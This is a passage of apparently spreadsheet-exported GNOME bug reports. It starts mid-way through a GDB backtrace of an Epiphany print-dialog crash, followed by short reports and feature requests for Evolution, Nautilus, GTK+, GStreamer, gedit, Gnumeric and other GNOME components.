   from /usr/lib/mozilla/components/libgklayout.so
#34 0x4136b2a6 in NSGetModule ()
   from /usr/lib/mozilla/components/libgklayout.so
#35 0x4136aa61 in NSGetModule ()
   from /usr/lib/mozilla/components/libgklayout.so
#36 0x416951bc in NSGetModule ()
   from /usr/lib/mozilla/components/libgklayout.so
#37 0x4168c974 in NSGetModule ()
   from /usr/lib/mozilla/components/libgklayout.so
#38 0x416945fe in NSGetModule ()
   from /usr/lib/mozilla/components/libgklayout.so
#39 0x4168c0d6 in NSGetModule ()
   from /usr/lib/mozilla/components/libgklayout.so
#40 0x418b3156 in nsCommonWidget::DispatchEvent(nsGUIEvent*
nsEventStatus&amp;) ()
   from /usr/lib/mozilla/components/libwidget_gtk2.so
#41 0x418aad2f in nsWindow::OnButtonReleaseEvent(_GtkWidget*
_GdkEventButton*)
    () from /usr/lib/mozilla/components/libwidget_gtk2.so
#42 0x418af08e in nsWindow::HideWindowChrome(int) ()
   from /usr/lib/mozilla/components/libwidget_gtk2.so
#43 0x405ad9e4 in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
#44 0x40b08a92 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#45 0x40b18da6 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#46 0x40b17ca3 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#47 0x40b180d6 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#48 0x4068fca7 in gtk_widget_send_expose () from
/usr/lib/libgtk-x11-2.0.so.0
#49 0x405ad7a7 in gtk_propagate_event () from
/usr/lib/libgtk-x11-2.0.so.0
#50 0x405ac506 in gtk_main_do_event () from
/usr/lib/libgtk-x11-2.0.so.0
#51 0x40769845 in _gdk_events_queue () from
/usr/lib/libgdk-x11-2.0.so.0
#52 0x40bad086 in unblock_source () from /usr/lib/libglib-2.0.so.0
#53 0x40bae029 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#54 0x40bae347 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#55 0x40bae9b0 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#56 0x40844038 in bonobo_main () from /usr/lib/libbonobo-2.so.0
#57 0x08074b7b in main ()
Thread 6 (Thread 114693 (LWP 1147)):
#0  0x40b3d5d4 in __pthread_sigsuspend () from /lib/libpthread.so.0
No symbol table info available.
#1  0x40b3d398 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x00000020 in ?? ()
No symbol table info available.
#3  0xbf1ff8d8 in ?? ()
No symbol table info available.
#4  0x40dfc290 in ?? () from /lib/libc.so.6
No symbol table info available.
Thread 5 (Thread 49156 (LWP 1060)):
#0  0x40b3d5d4 in __pthread_sigsuspend () from /lib/libpthread.so.0
No symbol table info available.
#1  0x40b3d398 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x00000020 in ?? ()
No symbol table info available.
#3  0xbf3ff968 in ?? ()
No symbol table info available.
#4  0x082074fc in ?? ()
No symbol table info available.
Thread 4 (Thread 32771 (LWP 1059)):
#0  0x40b3d5d4 in __pthread_sigsuspend () from /lib/libpthread.so.0
No symbol table info available.
#1  0x40b3d398 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x00000020 in ?? ()
No symbol table info available.
#3  0xbf5ff958 in ?? ()
No symbol table info available.
#4  0x08238ec0 in ?? ()
No symbol table info available.
Thread 3 (Thread 16386 (LWP 1058)):
#0  0x40d9b61a in poll () from /lib/libc.so.6
No symbol table info available.
#1  0x4015d629 in PR_OpenDir () from /usr/lib/libnspr4.so
No symbol table info available.
#2  0x411f6b02 in NSGetModule () from
/usr/lib/mozilla/components/libnecko.so
No symbol table info available.
#3  0x411f7319 in NSGetModule () from
/usr/lib/mozilla/components/libnecko.so
No symbol table info available.
#4  0x400e4c6b in nsThread::Main(void*) () from
/usr/lib/mozilla/libxpcom.so
No symbol table info available.
#5  0x4015ec69 in PR_Select () from /usr/lib/libnspr4.so
No symbol table info available.
#6  0x40b3ae31 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
#7  0x40da430a in clone () from /lib/libc.so.6
No symbol table info available.
Thread 2 (Thread 32769 (LWP 1057)):
#0  0x40d9b61a in poll () from /lib/libc.so.6
No symbol table info available.
#1  0x40b3ab30 in __pthread_manager () from /lib/libpthread.so.0
No symbol table info available.
#2  0x40da430a in clone () from /lib/libc.so.6
No symbol table info available.
Thread 1 (Thread 16384 (LWP 1055)):
#0  0x40b41bdb in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#1  0x402b4a94 in ?? () from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#2  0xfffffff4 in ?? ()
No symbol table info available.
#3  0x4027a884 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
No symbol table info available.
#4  0x4003f4f2 in nsProfileLock::FatalSignalHandler(int) ()
   from /usr/lib/libgtkembedmoz.so
No symbol table info available.
#5  0x40b407f5 in __pthread_sighandler () from /lib/libpthread.so.0
No symbol table info available.
#6  
No symbol table info available.
#7  0x0808dc83 in ephy_embed_selection_can_copy ()
No symbol table info available.
#8  0x0809542b in print_dialog_get_type ()
No symbol table info available.
#9  0x080b9ff1 in ephy_dialog_show ()
No symbol table info available.
#10 0x080b9e12 in ephy_dialog_add_enum ()
No symbol table info available.
#11 0x080b9fd1 in ephy_dialog_run ()
No symbol table info available.
#12 0x080acf55 in GPrintingPromptService::ShowPrintDialog(nsIDOMWindow*
nsIWebBrowserPrint* nsIPrintSettings*) ()
No symbol table info available.
#13 0x414676a3 in NSGetModule ()
   from /usr/lib/mozilla/components/libgklayout.so
No symbol table info available.
#14 0x41496952 in NSGetModule ()
   from /usr/lib/mozilla/components/libgklayout.so
No symbol table info available.
#15 0x41bf8dd5 in NSGetModule () from
/usr/lib/mozilla/components/libjsdom.so
No symbol table info available.
#16 0x400fe7d5 in XPTC_InvokeByIndex () from
/usr/lib/mozilla/libxpcom.so
No symbol table info available.
#17 0x411ac88f in NSGetModule ()
   from /usr/lib/mozilla/components/libxpconnect.so
No symbol table info available.
#18 0x411b38f5 in NSGetModule ()
   from /usr/lib/mozilla/components/libxpconnect.so
No symbol table info available.
#19 0x41109656 in js_Invoke () from /usr/lib/libmozjs.so
No symbol table info available.
#20 0x4111362f in js_Interpret () from /usr/lib/libmozjs.so
No symbol table info available.
#21 0x411097df in js_Invoke () from /usr/lib/libmozjs.so
No symbol table info available.
#22 0x41109ad3 in js_InternalInvoke () from /usr/lib/libmozjs.so
No symbol table info available.
#23 0x410e57bb in JS_CallFunctionValue () from /usr/lib/libmozjs.so
No symbol table info available.
#24 0x41bedb7d in NSGetModule () from
/usr/lib/mozilla/components/libjsdom.so
No symbol table info available.
#25 0x41c244d8 in NSGetModule () from
/usr/lib/mozilla/components/libjsdom.so
No symbol table info available.
#26 0x41502d50 in NSGetModule ()
   from /usr/lib/mozilla/components/libgklayout.so
No symbol table info available.
#27 0x4150415d in NSGetModule ()
   from /usr/lib/mozilla/components/libgklayout.so
No symbol table info available.
#28 0x414a8b28 in NSGetModule ()
   from /usr/lib/mozilla/components/libgklayout.so
No symbol table info available.
#29 0x41567aa3 in NSGetModule ()
   from /usr/lib/mozilla/components/libgklayout.so
No symbol table info available.
#30 0x4136b1bc in NSGetModule ()
   from /usr/lib/mozilla/components/libgklayout.so
No symbol table info available.
#31 0x4136b093 in NSGetModule ()
   from /usr/lib/mozilla/components/libgklayout.so
No symbol table info available.
#32 0x4150d7eb in NSGetModule ()
   from /usr/lib/mozilla/components/libgklayout.so
No symbol table info available.
#33 0x4150bcfe in NSGetModule ()
   from /usr/lib/mozilla/components/libgklayout.so
No symbol table info available.
#34 0x4136b2a6 in NSGetModule ()
   from /usr/lib/mozilla/components/libgklayout.so
No symbol table info available.
#35 0x4136aa61 in NSGetModule ()
   from /usr/lib/mozilla/components/libgklayout.so
No symbol table info available.
#36 0x416951bc in NSGetModule ()
   from /usr/lib/mozilla/components/libgklayout.so
No symbol table info available.
#37 0x4168c974 in NSGetModule ()
   from /usr/lib/mozilla/components/libgklayout.so
No symbol table info available.
#38 0x416945fe in NSGetModule ()
   from /usr/lib/mozilla/components/libgklayout.so
No symbol table info available.
#39 0x4168c0d6 in NSGetModule ()
   from /usr/lib/mozilla/components/libgklayout.so
No symbol table info available.
#40 0x418b3156 in nsCommonWidget::DispatchEvent(nsGUIEvent*
nsEventStatus&amp;) ()
   from /usr/lib/mozilla/components/libwidget_gtk2.so
No symbol table info available.
#41 0x418aad2f in nsWindow::OnButtonReleaseEvent(_GtkWidget*
_GdkEventButton*)
    () from /usr/lib/mozilla/components/libwidget_gtk2.so
No symbol table info available.
#42 0x418af08e in nsWindow::HideWindowChrome(int) ()
   from /usr/lib/mozilla/components/libwidget_gtk2.so
No symbol table info available.
#43 0x405ad9e4 in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#44 0x40b08a92 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#45 0x40b18da6 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#46 0x40b17ca3 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#47 0x40b180d6 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#48 0x4068fca7 in gtk_widget_send_expose () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#49 0x405ad7a7 in gtk_propagate_event () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#50 0x405ac506 in gtk_main_do_event () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#51 0x40769845 in _gdk_events_queue () from
/usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#52 0x40bad086 in unblock_source () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#53 0x40bae029 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#54 0x40bae347 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#55 0x40bae9b0 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#56 0x40844038 in bonobo_main () from /usr/lib/libbonobo-2.so.0
No symbol table info available.
#57 0x08074b7b in main ()
No symbol table info available.
#0  0x40b41bdb in waitpid () from /lib/libpthread.so.0
------- Bug moved to this database by unknown@bugzilla.gnome.org 2004-03-20 18:50 -------
The original reporter (eduardo@aridosperez.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component marco@gnome.org.
</t>
  </si>
  <si>
    <t>EVOLUTION-350884</t>
  </si>
  <si>
    <t>GMail like thread sorting</t>
  </si>
  <si>
    <t>I would like to promote a thread to top if it has a new mail or treat the date of the thread with the last new message that way no one misses a message in a thread. Gmail does it and I find it really usefull.</t>
  </si>
  <si>
    <t>BLAM-151164</t>
  </si>
  <si>
    <t>Scrolling to unread/latest item when switching channel</t>
  </si>
  <si>
    <t>It would be nice if the item list always scrolled to the (oldest or latest?)
unread item when the user selects a channel. If there are no unread items the
latest item should be selected. (Latest is the first or last in the list
depending on the sort order.)</t>
  </si>
  <si>
    <t>EVOLUTION-246404</t>
  </si>
  <si>
    <t>Evolution-1.4.3 not remembering printer definition</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you 
are doing.
Description of Problem:
Evolution-1.4.3 not remembering printer definition
Steps to reproduce the problem:
1.Select email to print
2.File &gt; Print &gt; Toggle Location &gt; enter cmd (lpr -P ) 
3.Select new email to print requires re-entering the same printer settings 
above (cmd)
Actual Results:
Evo-1.4.3 does not retain previously defined printer settigs
Expected Results:
Evo-1.4.3 to retain defined printer settings
How often does this happen? 
Every single time
Additional Information:
Problem appeared (at this site) after upgrade to Evo-1.4.3</t>
  </si>
  <si>
    <t>stacey</t>
  </si>
  <si>
    <t>NAUTILUS-62744</t>
  </si>
  <si>
    <t>Nautilus shows the names from .desktop or .directory files untranslated</t>
  </si>
  <si>
    <t>The display_name Nautilus uses is not localized.</t>
  </si>
  <si>
    <t>EVOLUTION-258015</t>
  </si>
  <si>
    <t>The task list of local computer is displaying twice in the task view.</t>
  </si>
  <si>
    <t>Description of Problem:
I m using evolution 1.5.7. In my evolution on task view the task list of
local computer is displaying twice.
It is displaying the task lists as:
&gt;On this computer
 Personal
On the Web
&gt;On this computer
 Personal
&gt;xchange@account.com
 Task
Actual Results:
Personal task list on this computer is displaying twice.
Expected Results:
It should be displayed once only
How often does this happen? 
Everytime
Additional Information:</t>
  </si>
  <si>
    <t>NAUTILUS-72208</t>
  </si>
  <si>
    <t>View as Text is non-functioning</t>
  </si>
  <si>
    <t>1) Start Nautilus
2) Navigate to a folder on your system that contains a regular text document
3) Double click on that document
Nautilus say Nautilus has no installed viewer capable of displaying
/gnome/drleary/uf-view_patch.
This is a major regression from Nautilus 1.x and should be considered a 2.0
blocker.
Josh</t>
  </si>
  <si>
    <t>GNOME-CALENDAR-765664</t>
  </si>
  <si>
    <t>.view style cannot be overridden by external CSS</t>
  </si>
  <si>
    <t>We have a problem in Ubuntu where Calendar is showing white corners.  We tried to fix this by having CSS in our theme which sets the GcalWindow background-color to transparent.  This worked in the inspector but not when this was in the our theme's CSS itself. (http://bazaar.launchpad.net/~ubuntu-art-pkg/ubuntu-themes/trunk/view/head:/Ambiance/gtk-3.0/apps/calendar.css)
I worked around this by 1st removing the .views section from data/theme/gtk-styles.css and then adding this to the bottom of that file:
GcalWindow  {
    background-color: transparent
}
I then reapplied the .views CSS from gtk-styles.css in our own theme CSS (i.e. I moved it from gtk-styles.css to our own theme CSS).
This issue is also reported in Launchpad where I have attached a couple of simple patches which do the above:  https://bugs.launchpad.net/ubuntu-themes/+bug/1565267</t>
  </si>
  <si>
    <t>will.cooke</t>
  </si>
  <si>
    <t>GNOME-SHELL-735385</t>
  </si>
  <si>
    <t>perf: fix wallpaper style for overridden background</t>
  </si>
  <si>
    <t>The code that loads SHELL_BACKGROUND_IMAGE which is used to load the
performance background was loading it in WALLPAPER mode not ZOOM
mode. Zoom mode is what we use for the actual GNOME defaultiwallpaper
and what we want to test: the background will be scaled except when
the resolution matches the 2560x1440 default backgrounds.</t>
  </si>
  <si>
    <t>EVOLUTION-210585</t>
  </si>
  <si>
    <t>Won't delete contacts in Evolution but will on PDA</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
I had a lot of duplicate contacts on my Visor and on my Evolution setup.  I
went through my contacts on the Visor and deleted the duplicates.  However
when I sync they don't appear to delete in the contacts list.
Steps to reproduce the problem:
1. Sync
2. Delete contact on PDA
3. Sync again
Actual Results:
Doesn't delete contact in Evolution
Expected Results:
Should delete contact in Evolution upon sync
How often does this happen? 
Everytime.
Additional Information:</t>
  </si>
  <si>
    <t>GOSSIP-414985</t>
  </si>
  <si>
    <t>Telepathy</t>
  </si>
  <si>
    <t>Setting the avatar with telepathy fails due to format string error</t>
  </si>
  <si>
    <t>Please describe the problem:
Setting the avatar from Personal information dialog always do nothing and prints this warning: WARNING **: Format was unrecognised could not find '/'
Looking at the code i've found that image_chooser_set_image_for_data checks image format string to be in the mime-like form (image/xxx).
Looking deeply i've found that telepathy backend asks telepathy for required avatar format takes the first element of the formats array returned and removes the part before the / (for example image/png becomes just png). Why it behaves this way?
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>GTK+-517394</t>
  </si>
  <si>
    <t>Native resize grip steals button release / General resizing bug</t>
  </si>
  <si>
    <t>When clicking the grip you first get a button press then you start moving and get the resize will begin call but never a button release. Either we stop using the native resizing (not sure that's possible) or fake a release event after resizing.</t>
  </si>
  <si>
    <t>GEDIT-103846</t>
  </si>
  <si>
    <t>make distclean doesn't work entirely properly</t>
  </si>
  <si>
    <t>When you run make distclean after building gedit and diff the result to
the original tarball they should be the same.
However the following differences are observed:
The following files are not removed:
po/.intltool-merge-cache
help/C/gedit-C.omf.out
help/ro/gedit-ro.omf.out
The following files are deleted and shouldn't be (or shouldn't be shipped
in the original tarball at all):
src/GNOME_Gedit-stubs.c
src/GNOME_Gedit-common.c
src/GNOME_Gedit-skels.c
src/GNOME_Gedit.h
src/gedit-marshal.c
src/gedit-marshal.h
plugins/spell/gedit-spell-checker-dialog-marshal.c
plugins/spell/gedit-spell-checker-dialog-marshal.h
The files
data/gedit.schemas
data/GNOME_Gedit.server
are both modified with different values for certain strings.</t>
  </si>
  <si>
    <t>EVOLUTION-259376</t>
  </si>
  <si>
    <t>Evoluiton crashes when tried to see right click options for the exchange account folders in contacts view</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
I am using evolution 1.5.8 with connector 1.5. I have the latest builds
dated 28-may-2004 and 31-may-2004 respectively.
Steps to reproduce the problem:
1. Go to contacts view
2. Select any exchange account folders or GAL
3. Right click on that.
Actual Results:
Evoluiton will crash
Expected Results:
It should show the right click options
How often does this happen? 
Everytime
Additional Information:
Back trace
(gdb) thread apply all bt
Thread 5 (Thread 131076 (LWP 3000)):
#0  0x4133fb94 in __pthread_sigsuspend () from /lib/i686/libpthread.so.0
#1  0x4133f9d8 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
#2  0x4133be90 in pthread_cond_wait@GLIBC_2.0 () from /lib/i686/libpthread.so.0
#3  0x41a60ae6 in e_book_open (book=0x83e9f78 only_if_exists=0
    error=0x429e1e04) at e-book.c:1448
#4  0x41a57972 in _open_handler (msg=0x83ea188) at e-book-async.c:128
#5  0x41a5762d in worker (data=0x83ea188 user_data=0x0) at e-book-async.c:27
#6  0x4153f7e2 in g_thread_pool_thread_proxy (data=0x8279c80)
    at gthreadpool.c:113
#7  0x4153e416 in g_thread_create_proxy (data=0x83ea290) at gthread.c:558
#8  0x4133cf60 in pthread_start_thread () from /lib/i686/libpthread.so.0
#9  0x4165e327 in clone () from /lib/i686/libc.so.6
Thread 4 (Thread 32771 (LWP 2964)):
#0  0x41655b66 in poll () from /lib/i686/libc.so.6
#1  0x41522efc in g_main_context_poll (context=0x8279960 timeout=-1
    priority=2147483647 fds=0x42a022b0 n_fds=9) at gmain.c:2850
#2  0x41522041 in g_main_context_iterate (context=0x8279960 block=1
    dispatch=1 self=0x8273ff0) at gmain.c:2527
#3  0x41522a54 in g_main_loop_run (loop=0x8272cd8) at gmain.c:2752
---Type  to continue or q  to quit---
#4  0x409967ee in link_thread_io_context ()
   from /opt/gnome/lib/libORBitCosNaming-2.so.0
#5  0x4153e416 in g_thread_create_proxy (data=0x8273ff0) at gthread.c:558
#6  0x4133cf60 in pthread_start_thread () from /lib/i686/libpthread.so.0
#7  0x4165e327 in clone () from /lib/i686/libc.so.6
Thread 3 (Thread 16386 (LWP 2963)):
#0  0x41655b66 in poll () from /lib/i686/libc.so.6
#1  0x41522efc in g_main_context_poll (context=0x8254d98 timeout=-1
    priority=2147483647 fds=0x8272778 n_fds=1) at gmain.c:2850
#2  0x41522041 in g_main_context_iterate (context=0x8254d98 block=1
    dispatch=1 self=0x8259598) at gmain.c:2527
#3  0x41522a54 in g_main_loop_run (loop=0x8283c28) at gmain.c:2752
#4  0x41a6292a in startup_mainloop (arg=0x0) at e-book.c:2202
#5  0x4133cf60 in pthread_start_thread () from /lib/i686/libpthread.so.0
#6  0x4165e327 in clone () from /lib/i686/libc.so.6
Thread 2 (Thread 32769 (LWP 2962)):
#0  0x41655b66 in poll () from /lib/i686/libc.so.6
#1  0x4133ca8e in __pthread_manager () from /lib/i686/libpthread.so.0
#2  0x4165e327 in clone () from /lib/i686/libc.so.6
Thread 1 (Thread 16384 (LWP 2952)):
---Type  to continue or q  to quit---
#0  0x41343ab6 in waitpid () from /lib/i686/libpthread.so.0
#1  0x4048400c in libgnomeui_module_info_get ()
   from /opt/gnome/lib/libgnomeui-2.so.0
#2  0x0806531d in segv_redirect (sig=11) at main.c:454
#3  0x4134296c in __pthread_sighandler () from /lib/i686/libpthread.so.0
#4  
#5  0x415f9dea in strcmp () from /lib/i686/libc.so.6
#6  0x41b9fab9 in fill_popup_menu_callback (selector=0x823fc60
    menu=0x83f0080 view=0x8207b18) at addressbook-view.c:752
#7  0x414d5db3 in g_cclosure_marshal_VOID__OBJECT (closure=0x8242b50
    return_value=0x0 n_param_values=2 param_values=0xbfffedf0
    invocation_hint=0xbfffec58 marshal_data=0x0) at gmarshal.c:636
#8  0x414bcde4 in g_closure_invoke (closure=0x8242b50 return_value=0x0
    n_param_values=2 param_values=0xbfffedf0 invocation_hint=0xbfffec58)
    at gclosure.c:437
#9  0x414d458d in signal_emit_unlocked_R (node=0x823fc00 detail=0
    instance=0x823fc60 emission_return=0x0 instance_and_params=0xbfffedf0)
    at gsignal.c:2436
#10 0x414d36d8 in g_signal_emit_valist (instance=0x823fc60 signal_id=230
    detail=0 var_args=0xbfffef80 i#\b\020\a\b=) at gsignal.c:2195
#11 0x414d3a25 in g_signal_emit (instance=0x823fc60 signal_id=230 detail=0)
    at gsignal.c:2239
#12 0x4005ee44 in selector_button_press_event (widget=0x823fc60
---Type  to continue or q  to quit---
    event=0x8146160 selector=0x823fc60) at e-source-selector.c:598
#13 0x410722fc in _gtk_marshal_BOOLEAN__BOXED ()
   from /opt/gnome/lib/libgtk-x11-2.0.so.0
#14 0x414bcde4 in g_closure_invoke (closure=0x8242730
    return_value=0xbffff170 n_param_values=2 param_values=0xbffff340
    invocation_hint=0xbffff1a8) at gclosure.c:437
#15 0x414d458d in signal_emit_unlocked_R (node=0x8117a28 detail=0
    instance=0x823fc60 emission_return=0xbffff2c0
    instance_and_params=0xbffff340) at gsignal.c:2436
#16 0x414d3755 in g_signal_emit_valist (instance=0x823fc60 signal_id=43
    detail=0 var_args=0xbffff4d0 ) at gsignal.c:2205
#17 0x414d3a25 in g_signal_emit (instance=0x823fc60 signal_id=43 detail=0)
    at gsignal.c:2239
#18 0x4116fe02 in gtk_widget_send_expose ()
   from /opt/gnome/lib/libgtk-x11-2.0.so.0
#19 0x4116f93a in gtk_widget_event () from /opt/gnome/lib/libgtk-x11-2.0.so.0
#20 0x4107213f in gtk_propagate_event ()
   from /opt/gnome/lib/libgtk-x11-2.0.so.0
#21 0x41070c51 in gtk_main_do_event () from /opt/gnome/lib/libgtk-x11-2.0.so.0
#22 0x413dc76d in _gdk_events_queue () from /opt/gnome/lib/libgdk-x11-2.0.so.0
#23 0x415207cd in g_main_dispatch (context=0x80889f8) at gmain.c:1905
#24 0x41521b39 in g_main_context_dispatch (context=0x80889f8) at gmain.c:2451
#25 0x4152206c in g_main_context_iterate (context=0x80889f8 block=1
---Type  to continue or q  to quit---
    dispatch=1 self=0x80763a0) at gmain.c:2532
#26 0x41522a54 in g_main_loop_run (loop=0x80c5280) at gmain.c:2752
#27 0x407c1726 in bonobo_main () from /opt/gnome/lib/libbonobo-2.so.0
#28 0x0806584f in main (argc=1 argv=0xbffff964) at main.c:604
#0  0x41343ab6 in waitpid () from /lib/i686/libpthread.so.0
(gdb)</t>
  </si>
  <si>
    <t>NAUTILUS-141073</t>
  </si>
  <si>
    <t>No limit on thumbnail cache - big disk space waste</t>
  </si>
  <si>
    <t>This bug was reported in the Debian BTS : http://bugs.debian.org/235067
Nautilus generates preview icons but it does not erase icons for deleted files
or age out old icons to limit cache size. This adds up fast -- I found that my
thumbnail directory was eating nearly 2gig
space. (Our project includes many texture maps with a build revision built into
all names - that means thousands of new file names with each nightly build.)
My local fix is a nightly cron job that erases thumbnail files over a week old
but this should really be done by Nautilus.
Limiting by total size file date or even an option to purge all thumbnails on
shutdown/startup would be ideal.</t>
  </si>
  <si>
    <t>GLIB-118536</t>
  </si>
  <si>
    <t>Make g_signal_connect_object'ed handlers disconnect when the data object is destroyed</t>
  </si>
  <si>
    <t>It'd be quite useful to have signal handlers connected using
g_signal_connect_object(instance signal handler gobject flags)
be disconnected when the data gobject dies. 
From a discussion about this with yosh in #gtk+ it seems that when the
data gobject dies the closure built by g_signal_connect_object gets
invalidated but that each time the emiting instance emits the signal after
the gobject dies there'll be a small overhead incurred because the closure
will be checked.</t>
  </si>
  <si>
    <t>GSTREAMER-351791</t>
  </si>
  <si>
    <t>Crashes playing crasher.nsv</t>
  </si>
  <si>
    <t>nsv_read_header()
filename 'gstreamer://0x9a0a10'
nsv_resync() offset = 0 state = 0
NSV resynced on NSVs after 4 bytes
nsv_parse_NSVs_header()
NSV NSVs framerate code 19
NSV NSVs vtag: tag=VP31
NSV NSVs atag: tag=MP3
NSV NSVs vsize 320x240
nsv_read_chunk(1)
NSV CHUNK 0 aux 1476 bytes video 416 bytes audio
parsed header
nsv_read_packet()
nsv_read_packet: using cached packet[0]
nsv_read_packet()
nsv_read_packet: using cached packet[1]
nsv_read_packet()
nsv_read_chunk(0)
nsv_resync() offset = 1916 state = 0
NSV resynced on BEEF after 2 bytes
NSV CHUNK 0 aux 1472 bytes video 208 bytes audio
nsv_read_packet: using cached packet[0]
nsv_read_packet()
nsv_read_packet: using cached packet[1]
nsv_read_packet()
nsv_read_chunk(0)
nsv_resync() offset = 3603 state = 0
NSV resynced on BEEF after 2 bytes
NSV CHUNK 0 aux 1444 bytes video 416 bytes audio
nsv_read_packet: using cached packet[0]
nsv_read_packet()
nsv_read_packet: using cached packet[1]
nsv_read_packet()
nsv_read_chunk(0)
nsv_resync() offset = 5470 state = 0
NSV resynced on BEEF after 2 bytes
NSV CHUNK 0 aux 1720 bytes video 208 bytes audio
nsv_read_packet: using cached packet[0]
nsv_read_packet()
nsv_read_packet: using cached packet[1]
nsv_read_packet()
nsv_read_chunk(0)
nsv_resync() offset = 7405 state = 0
NSV resynced on BEEF after 2 bytes
NSV CHUNK 0 aux 1396 bytes video 416 bytes audio
nsv_read_packet: using cached packet[0]
nsv_read_packet()
nsv_read_packet: using cached packet[1]
nsv_read_packet()
nsv_read_chunk(0)
nsv_resync() offset = 9224 state = 0
NSV resynced on BEEF after 2 bytes
NSV CHUNK 0 aux 1320 bytes video 208 bytes audio
nsv_read_packet: using cached packet[0]
nsv_read_packet()
nsv_read_packet: using cached packet[1]
nsv_read_packet()
nsv_read_chunk(0)
nsv_resync() offset = 10759 state = 0
NSV resynced on BEEF after 2 bytes
NSV CHUNK 0 aux 1492 bytes video 416 bytes audio
nsv_read_packet: using cached packet[0]
nsv_read_packet()
nsv_read_packet: using cached packet[1]
nsv_read_packet()
nsv_read_chunk(0)
nsv_resync() offset = 12674 state = 0
NSV resynced on BEEF after 2 bytes
NSV CHUNK 0 aux 1668 bytes video 208 bytes audio
nsv_read_packet: using cached packet[0]
Segmentation fault
gstreamer-plugins-bad-0.10.3-2
gstreamer-plugins-good-devel-0.10.3.2-0.gst.1.5
gstreamer-plugins-base-0.10.9-0.gst.2.5
gstreamer-ffmpeg-0.10.1-0.gst.1.5
gstreamer-tools-0.10.9-0.gst.1.5
gstreamer-plugins-good-0.10.3.2-0.gst.1.5
gstreamer-plugins-base-devel-0.10.9-0.gst.2.5
gstreamer-0.10.9-0.gst.1.5
gstreamer-plugins-ugly-0.10.3.2-0.gst.1.5
gstreamer-devel-0.10.9-0.gst.1.5</t>
  </si>
  <si>
    <t>GNOMORADIO-56765</t>
  </si>
  <si>
    <t>request unknown song does not work</t>
  </si>
  <si>
    <t>it simply does nothing when you hit request</t>
  </si>
  <si>
    <t>GNUMERIC-80299</t>
  </si>
  <si>
    <t>empty optional parameters for expression cause problems when exported to XLS in excel98 and openCalc</t>
  </si>
  <si>
    <t>If you use expressions that take optional parameters (such as round()) and
you don't provide them OpenCalc and Excel will have trouble reading the
gnimeric-produced XLS file. OpenCalc adds a #NAME? as the first parameter
for the expression (and Excel reported to read it wrong too somehow I
don't have excel :/). When I open up XLS file generated with OpenCalc and
use the same expression '=round(A1)' it gets imported to gnumeric as
'=round(A1)'.
My guess is one needs to export empty parameters for such functions when
exporting to XLS ('=foo(A1)').
Attached is two files - optional-params.xls is exported from gnumeric and
causes problems in OpenCalc and Excel. optional-params-opencalc.xls is the
same sheet saved with OpenCalc and works in Gnumeric too but has those
empty params in all expressions.</t>
  </si>
  <si>
    <t>GNOME-APPLETS-100223</t>
  </si>
  <si>
    <t>cdplayer applet should stop play when removed from panel or logout</t>
  </si>
  <si>
    <t>Currently cdplayer_applet2 has this bug
Bug filed by anju.premachandran@wipro.com
1. Invoke cd-player applet.
2.Play music.
3.Remove the applet from the panel
Music continues to play
4.Logout from the session
Music continues to play
5.Login as a different user
Music continues to play
Expected behaviour:
Music should stop playing when user logs out.
There is rather easy to fi here
One only need to make sure cdrom_stop() is called when a 'destroy'
and 'delete_event' is handled.
Will attach a patch next.</t>
  </si>
  <si>
    <t>GSTREAMER-515457</t>
  </si>
  <si>
    <t>[audiofx] Element long descriptions are broken</t>
  </si>
  <si>
    <t>Hi
attached patch fixes the element's long descriptions to make some sense. Before they were only the type name.
Bye</t>
  </si>
  <si>
    <t>GEDIT-PLUGINS-721946</t>
  </si>
  <si>
    <t>Add new env var GEDIT_CURRENT_DOCUMENT_PATH</t>
  </si>
  <si>
    <t>Created attachment 265950
Add GEDIT_CURRENT_DOCUMENT_LANGUAGE env var
I'd like to have this reviewed to know what I am doing wrong. Currently the env var contains None.</t>
  </si>
  <si>
    <t>EVOLUTION-237935</t>
  </si>
  <si>
    <t>Text in calendar is misaligned</t>
  </si>
  <si>
    <t>In the daily view of the calendar you'll see a calendar at left.  The top
shows a month name.  The bottom few pixels of each character is cut off. 
